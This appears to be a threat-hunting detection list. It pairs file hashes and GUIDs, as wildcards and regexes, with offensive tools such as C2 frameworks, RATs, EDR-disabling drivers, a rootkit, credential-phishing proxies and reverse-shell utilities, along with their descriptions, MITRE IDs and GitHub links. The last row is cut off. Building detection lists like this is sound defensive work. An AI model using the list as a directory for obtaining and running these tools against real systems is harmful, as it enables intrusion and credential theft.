"*04d10bef7b5d5a3c16782bc908ec5ea1ceacf33588c12d65ee4d314f6133d0f7*",".{0,1000}04d10bef7b5d5a3c16782bc908ec5ea1ceacf33588c12d65ee4d314f6133d0f7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*",".{0,1000}04DFB6E4\-809E\-4C35\-88A1\-2CC5F1EBFEBD.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*",".{0,1000}04DFB6E4\-809E\-4C35\-88A1\-2CC5F1EBFEBD.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*04eb0f500553c9d58de8f5a8bb102cba7dcb0d1e9a77baa4227237c49a5e81d8*",".{0,1000}04eb0f500553c9d58de8f5a8bb102cba7dcb0d1e9a77baa4227237c49a5e81d8.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*04FC654C-D89A-44F9-9E34-6D95CE152E9D*",".{0,1000}04FC654C\-D89A\-44F9\-9E34\-6D95CE152E9D.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*050c8a0def9c19dbc64296f5a4834a902756ed06a740bdc7e0170a8748792bd5*",".{0,1000}050c8a0def9c19dbc64296f5a4834a902756ed06a740bdc7e0170a8748792bd5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*052C26C0-7979-4555-89CE-34C5CE8D8B34*",".{0,1000}052C26C0\-7979\-4555\-89CE\-34C5CE8D8B34.{0,1000}","offensive_tool_keyword","RevengeRAT-Stub-Cssharp","RevengeRAT - AsyncRAT Simple RAT","T1219 - T1055 - T1569.002 - T1035 - T1071 - T1105","TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/NYAN-x-CAT/RevengeRAT-Stub-Cssharp","1","0","N/A","10","10","81","47","2020-03-02T11:34:36Z","2019-09-15T09:39:07Z" "*055BC73F-FCAE-4361-B035-2E156A101EA9*",".{0,1000}055BC73F\-FCAE\-4361\-B035\-2E156A101EA9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*056a00cd961e5d38f464d6a15393c92f3f0cef668e396f9595822e7147b4c25e*",".{0,1000}056a00cd961e5d38f464d6a15393c92f3f0cef668e396f9595822e7147b4c25e.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*05703420a4694ddc3d737d5f7dd589ff1288b05fec2bdc6f5b0f1227509429f9*",".{0,1000}05703420a4694ddc3d737d5f7dd589ff1288b05fec2bdc6f5b0f1227509429f9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0599c7537d4b728cd234412440a11a6cc54297b3c7af59c1d0309850aca0da53*",".{0,1000}0599c7537d4b728cd234412440a11a6cc54297b3c7af59c1d0309850aca0da53.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*05B4EB7F-3D59-4E6A-A7BC-7C1241578CA7*",".{0,1000}05B4EB7F\-3D59\-4E6A\-A7BC\-7C1241578CA7.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*05bdafc5a389b57dab75449e8932ad17eb9871d2767263e6d0576568319974d8*",".{0,1000}05bdafc5a389b57dab75449e8932ad17eb9871d2767263e6d0576568319974d8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*05f4184029b94e304fcef2f2c6875c1fb2a226f0d94fce013643727b10b169a5*",".{0,1000}05f4184029b94e304fcef2f2c6875c1fb2a226f0d94fce013643727b10b169a5.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","file_hash","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*05f5eabab4a5f65f2bb08d967d6af41247465af213f1c874ad0e059c0a3ebedc*",".{0,1000}05f5eabab4a5f65f2bb08d967d6af41247465af213f1c874ad0e059c0a3ebedc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*05fd2d9fd3a8ebed7848e8acc758d0c7964b6d3c85ce81cdbbe93d679fe1acac*",".{0,1000}05fd2d9fd3a8ebed7848e8acc758d0c7964b6d3c85ce81cdbbe93d679fe1acac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*05fe66796ef2ccd1e425281d7b042a531891f5914281e22eabbf283635b6d6e9*",".{0,1000}05fe66796ef2ccd1e425281d7b042a531891f5914281e22eabbf283635b6d6e9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*061d593aaf747fa8db9674c17bc8d2baa9459b825a196f457b006ff00d4be696*",".{0,1000}061d593aaf747fa8db9674c17bc8d2baa9459b825a196f457b006ff00d4be696.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*064d0c20e561c1208898028b84dcebf37861b15f33c0a4828ea14ee055ba3f98*",".{0,1000}064d0c20e561c1208898028b84dcebf37861b15f33c0a4828ea14ee055ba3f98.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*065c05950f37c55ceff48bc70d2733424e7e92687faefc803719ff22a5e0156f*",".{0,1000}065c05950f37c55ceff48bc70d2733424e7e92687faefc803719ff22a5e0156f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*0675558d182096b75d100d91c77c1119d229c315f12bb86e353e49894b9e1d62*",".{0,1000}0675558d182096b75d100d91c77c1119d229c315f12bb86e353e49894b9e1d62.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*06a73e3d9717d7eb479c272ec005cef62ceb617735d4551fdaeab8a695abd7a5*",".{0,1000}06a73e3d9717d7eb479c272ec005cef62ceb617735d4551fdaeab8a695abd7a5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*06B2B14A-CE87-41C0-A77A-2644FE3231C7*",".{0,1000}06B2B14A\-CE87\-41C0\-A77A\-2644FE3231C7.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*06b7c041c6fb84a9b88ea99497787b0812e888e3591e71df3493180cfc1191fd*",".{0,1000}06b7c041c6fb84a9b88ea99497787b0812e888e3591e71df3493180cfc1191fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*06c177a58759cb2d8947e425086a1d945d252c411c649121c5ec1bb795452b34*",".{0,1000}06c177a58759cb2d8947e425086a1d945d252c411c649121c5ec1bb795452b34.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*06e7d0050e4aac352307c5b20372badd841e275bafc1dfe2ecbd0f2ad6366f81*",".{0,1000}06e7d0050e4aac352307c5b20372badd841e275bafc1dfe2ecbd0f2ad6366f81.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*06e8a15602cc6001db8ac6d14c4cf938a92aab83a446bcd5c2c4334ad4b44e6e*",".{0,1000}06e8a15602cc6001db8ac6d14c4cf938a92aab83a446bcd5c2c4334ad4b44e6e.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*06e8f3cc9768b22015a52d96357a11185c43c239e887a1346e58eb8ab08c4471*",".{0,1000}06e8f3cc9768b22015a52d96357a11185c43c239e887a1346e58eb8ab08c4471.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*06f02a7b690087feea7f4e48b71e219c98de681cf3b1fdc3097f6264775dab62*",".{0,1000}06f02a7b690087feea7f4e48b71e219c98de681cf3b1fdc3097f6264775dab62.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924*",".{0,1000}070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*07628592-5A22-4C0A-9330-6C90BD7A94B6*",".{0,1000}07628592\-5A22\-4C0A\-9330\-6C90BD7A94B6.{0,1000}","offensive_tool_keyword","LocalAdminSharp",".NET executable to use when dealing with privilege escalation on Windows to gain local administrator access","T1055.011 - T1068 - T1548.002 - T1548.003 - T1548.004","TA0004","N/A","N/A","Privilege Escalation","https://github.com/notdodo/LocalAdminSharp","1","0","N/A","10","2","150","17","2022-11-01T17:45:43Z","2022-01-01T10:35:09Z" "*07a474dfcef198d7d5bf8261de06eed7c9528802e9065faf2a63c7ef6b992986*",".{0,1000}07a474dfcef198d7d5bf8261de06eed7c9528802e9065faf2a63c7ef6b992986.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*07aa565057af859bc4956df913246b3b5fe39e86823666d6ba77aa98a697b02a*",".{0,1000}07aa565057af859bc4956df913246b3b5fe39e86823666d6ba77aa98a697b02a.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*",".{0,1000}07DFC5AA\-5B1F\-4CCC\-A3D3\-816ECCBB6CB6.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*07e797c5274603d550b84df6cd3300d7ce9dc9903237b7f11b66821655712956*",".{0,1000}07e797c5274603d550b84df6cd3300d7ce9dc9903237b7f11b66821655712956.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*07fd00d4ecb5a197dec04d8ea359227ec5b6616f67034dda1f5da8824df91cac*",".{0,1000}07fd00d4ecb5a197dec04d8ea359227ec5b6616f67034dda1f5da8824df91cac.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*080c6108c3bd0f8a43d5647db36dc434032842339f0ba38ad1ff62f72999c4e5*",".{0,1000}080c6108c3bd0f8a43d5647db36dc434032842339f0ba38ad1ff62f72999c4e5.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*0817f34dc2b4937f2ea352171e08852bf635b147f6bd77f1c9bdc2dde9f145b9*",".{0,1000}0817f34dc2b4937f2ea352171e08852bf635b147f6bd77f1c9bdc2dde9f145b9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*08349c406f6b963930b5ad1ec36e2f5f3b42fb5e3bbd887fabb8ab039592e157*",".{0,1000}08349c406f6b963930b5ad1ec36e2f5f3b42fb5e3bbd887fabb8ab039592e157.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*083c3acddf8e359225bdb42167294f87b16095eafe686dcfab41cd0e2d5e7ebf*",".{0,1000}083c3acddf8e359225bdb42167294f87b16095eafe686dcfab41cd0e2d5e7ebf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*",".{0,1000}086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*087fc2c7df1f06a75caf0a25c448736b649aba88d37f2179e01dca89e16a35fd*",".{0,1000}087fc2c7df1f06a75caf0a25c448736b649aba88d37f2179e01dca89e16a35fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*088358bbd95bde68104156dc538c8c7d7e77e06dbd5887c6deefea79f48c2fa4*",".{0,1000}088358bbd95bde68104156dc538c8c7d7e77e06dbd5887c6deefea79f48c2fa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*089b8bdbe138301d16cce615880632cd2b211b9f20b31d4748f88851bd13a79a*",".{0,1000}089b8bdbe138301d16cce615880632cd2b211b9f20b31d4748f88851bd13a79a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*",".{0,1000}08AEC00F\-42ED\-4E62\-AE8D\-0BFCE30A3F57.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*08bdf0baeae215d62da086a06124b26d50d1f77ab021c17a849084648daa7d35*",".{0,1000}08bdf0baeae215d62da086a06124b26d50d1f77ab021c17a849084648daa7d35.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*08bf766742ad601442e6200717c9a5ca004de85c350353dd2793b5c29e1db995*",".{0,1000}08bf766742ad601442e6200717c9a5ca004de85c350353dd2793b5c29e1db995.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*08ca5b5dae3c18f7a5bed317a0650f8f015207facf43ec829b9a3cf7fa63ffa2*",".{0,1000}08ca5b5dae3c18f7a5bed317a0650f8f015207facf43ec829b9a3cf7fa63ffa2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 